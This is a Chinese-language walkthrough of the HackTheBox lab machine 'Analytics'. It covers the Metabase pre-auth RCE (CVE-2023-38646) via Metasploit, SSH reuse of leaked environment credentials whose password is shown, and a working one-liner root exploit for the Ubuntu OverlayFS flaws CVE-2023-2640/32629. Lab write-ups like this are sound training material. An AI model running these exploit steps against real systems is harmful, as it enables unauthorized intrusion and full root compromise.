文章目录
- 1 端口扫描
- 2 测试思路
- 3 漏洞探测
- 4 权限获取
- 5 权限提升
Analytics 测试过程
1 端口扫描
nmap -sC -sV 10.129.205.142
2 测试思路
目标服务器只开启了80端口,所以出发点从80端口开始。对于web页面,能做的大致思路有:
1.目录扫描
2.网站信息泄漏
3.探测web站点漏洞
4.网站指纹
3 漏洞探测
1.访问web站点
echo "10.129.205.142 analytical.htb" | sudo tee -a /etc/hosts
访问web站点:http://analytical.htb/,发现存在login登录页面。
echo "10.129.205.142 data.analytical.htb" | sudo tee -a /etc/hosts
点击 Login 访问登录页面 http://data.analytical.htb,发现使用Metabase开源商业智能工具,探测是否有Metabase相关漏洞。
2.搜索Metabase相关漏洞
search metabase
发现Metabase存在CVE-2023-38646,可以进行CVE-2023-38646漏洞利用
3.CVE-2023-38646漏洞利用
use exploit/linux/http/metabase_setup_token_rce
show options
# 使用env命令查看环境变量,发现存在用户名密码
META_USER=metalytics
META_PASS=An4lytics_ds20223#
接下来尝试使用ssh进行登录,如果可以连接,就能获取到metalytics的用户权限。
4 权限获取
ssh登录,成功获取到metalytics用户权限,查看用户flag。
ssh metalytics@10.129.205.142
5 权限提升
# 显示出自己(执行 sudo 的使用者)的权限
sudo -l
# 显示系统所有相关信息
uname -a
通过查看系统相关信息,发现内核版本,查看该版本是否存在内核提权漏洞。Ubuntu内核的OverlayFS模块中,存在CVE-2023-2640 和 CVE-2023-32629漏洞,可以通过该漏洞将权限提升至root权限。
漏洞利用代码如下:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
ls -la /root
cat /root/root.txt
